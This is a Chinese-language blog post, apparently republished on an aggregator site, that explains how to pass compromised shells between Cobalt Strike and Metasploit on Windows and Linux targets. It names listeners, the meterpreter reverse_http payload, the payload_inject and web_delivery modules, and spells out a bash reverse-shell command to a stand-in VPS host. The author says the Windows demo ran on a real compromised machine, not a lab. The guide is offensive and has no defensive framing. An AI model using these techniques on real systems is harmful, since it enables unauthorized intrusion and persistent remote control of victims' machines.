我是靠谱客的博主 舒适草莓,最近开发中收集的这篇文章主要介绍Cobalt_Strike与Metasploit(msf)联动-Win或Linux不同系统之间互相弹shell前言一、Cobalt Strike的shell弹给msf(windows)二、msf反弹回cs(windows)三、目标Linux系统,cs反弹回msf四、目标Linux系统,msf反弹shell给cs总结,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

文章目录

  • 前言
  • 一、Cobalt Strike的shell弹给msf(windows)
    • 选对payload
  • 二、msf反弹回cs(windows)
  • 三、目标Linux系统,cs反弹回msf
    • web_delivery模块一条命令上线msf
  • 四、目标Linux系统,msf反弹shell给cs
  • 总结


前言

实现Cobalt_Strike和Metasploit的联动,让shell在两者之间可以弹来弹去,因为两者的功能区别还是有的,两个工具都各有所长,所以为了更多的功能能够得到利用,两者之间的联动很有必要记录一下。


提示:以下是本篇文章正文内容,下面案例可供参考

一、Cobalt Strike的shell弹给msf(windows)

首先,cs上面要有上线的主机,比如我就搞了一台windows的上线了,因为是mac电脑的原因我懒得弄虚拟机,所以又实战搞了一台来做演示,真的服了……好怀念windows ,只能打码了。
上面是普通权限,下面是提权之后的。
在这里插入图片描述
cs上面有了,接下来就是把shell派生到msf,需要提前建立监听器,Payload设置成Foreign HTTP协议,Host就设置成装有msf的vps服务器地址,公网的。下面就是端口。

在这里插入图片描述
设置完监听器,msf也要配置一下:
在这里插入图片描述
msf上面的payload要和cs上面的类型协议保持一致,用http的。然后是设置监听的主机和端口,也要和cs上面的一致。
在这里插入图片描述
点击run开始监听,然后cs点击Spawn模块,派生shell给到msf:
在这里插入图片描述
发现报错了:
在这里插入图片描述
我仔细看了一下,原来是payload设置错了,应该是下面这个payload才对。

选对payload

windows/meterpreter/reverse_http

设置的步骤和前面的一样。

然后再在cs点击Spawn,选中监听器,msf就成功获得shell了。

在这里插入图片描述
将msf的编码设置一下,就不会乱码了

chcp 65001

在这里插入图片描述
成功,和cs上面的一致。
在这里插入图片描述

二、msf反弹回cs(windows)

上面我们用cs,把shell给到msf,那么接下来就是msf再给到cs。
继续上面的操作,exit退出,再background把shell存到session里:
在这里插入图片描述
然后需要用到msf的local/payload_inject模块来进行反弹shell。
在这里插入图片描述
这里的lhost和lpost就是cs上面监听器的配置,所以需要提前在cs上创建一个监听器:
在这里插入图片描述
在msf上面配置:
在这里插入图片描述
完成后直接exploit或者run:

在这里插入图片描述

cs立马上线。
在这里插入图片描述

三、目标Linux系统,cs反弹回msf

这个我之前有写过,直接贴链接。很详细的说明。

Linux被控主机反弹shell给Cobalt_Strike(CS)-详细实战笔记
通过上面的办法,让一台linux系统的主机先上线到cs后,开始下一步的操作。
下面我是又搞了台Linux的上线cs了:
在这里插入图片描述
将这个cs的shell再给到msf,用到的方法很简单,????注意了,Linux的主机可不能再用cs的派生shell模块Spawn,是没办法用到。为了解决这个问题,要从Linux最本质的原理出发,它不是自带反弹shell的base -i么,直接用就完事了。

先在msf上建立监听:
在这里插入图片描述
注意payload一定要选对,确定好Linux的系统版本.
在这里插入图片描述

然后监听的类型是反向连接的reverse,协议tcp。run或者exploit开始监听,然后在cs输入base -i 反弹shell命令:

bash -i >& /dev/tcp/vpsip/2321 0>&1

发现不行,没有反映,我又试着用pyton的反弹shell命令,也是不行,前者是毫无反应,后者有反应,但是弹不回shell.

在这里插入图片描述
命令没错,具体为什么不行,我现在也不知道为什么,有知道的可以说一下。但是解决的办法肯定是有的,条条大路通罗马。

web_delivery模块一条命令上线msf

我思来想去,还得是用到这个模块:

exploit/multi/script/web_delivery模块

直接一条命令上线msf。操作如下:
1、使用exploit/multi/script/web_delivery模块
2、设置target目标,为set targer为Linux
3、设置payload,payload是反向连接的类型reverse,
tcp协议。
4、run或exploit执行
在这里插入图片描述
运行后会出现一条命令,直接cs复制粘贴运行即可:
在这里插入图片描述
ok大功告成,msf成功接收到了session.
完美!
在这里插入图片描述
执行命令也是没毛病:
在这里插入图片描述

四、目标Linux系统,msf反弹shell给cs

那么,又到了最后一步,也是这次完整实验的最后一个,目标是Linux的,怎么给到cs。
同样的,也可以用老方法:
Linux被控主机反弹shell给Cobalt_Strike(CS)-详细实战笔记
将Cross2C生成的文件在msf中执行它,cs就可以上线了,但是这个办法有点麻烦,因为要文件上传,搞来搞去的不是很方便。但是我又实在是找不到更容易的办法。
Linux系统还是没有windows的渗透好搞,就是步骤比较麻烦一点,问题不大,如果有什么更好的办法,请大佬们告诉我。

总结

最全的Cobalt Strike和msf之间的联动实验了,我看网上都是东一块西一块,还没见过windows和linux系统合在一起说明的,今天我一次性把双系统,双工具之间的联动讲得明明白白。主要是最近加班多,脑子记忆力不太好,很多东西昨天学今天忘,一下子不做就容易忘记,又来百度找资料就很麻烦,而且很多抄袭甚至不成功的办法也贴出来,处处碰壁,所以干脆自己记一记,下次直接在自己主页搜就方便了。

    文章原创,欢迎转载,请注明文章出处: Cobalt_Strike与Metasploit(msf)联动-Win或Linux不同系统之间互相弹shell.。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般都有时效性,本人习惯不定期对自己的博文进行修正和更新,因此请访问出处以查看本文的最新版本。

最后

以上就是舒适草莓为你收集整理的Cobalt_Strike与Metasploit(msf)联动-Win或Linux不同系统之间互相弹shell前言一、Cobalt Strike的shell弹给msf(windows)二、msf反弹回cs(windows)三、目标Linux系统,cs反弹回msf四、目标Linux系统,msf反弹shell给cs总结的全部内容,希望文章能够帮你解决Cobalt_Strike与Metasploit(msf)联动-Win或Linux不同系统之间互相弹shell前言一、Cobalt Strike的shell弹给msf(windows)二、msf反弹回cs(windows)三、目标Linux系统,cs反弹回msf四、目标Linux系统,msf反弹shell给cs总结所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(35)

评论列表共有 0 条评论

立即
投稿
返回
顶部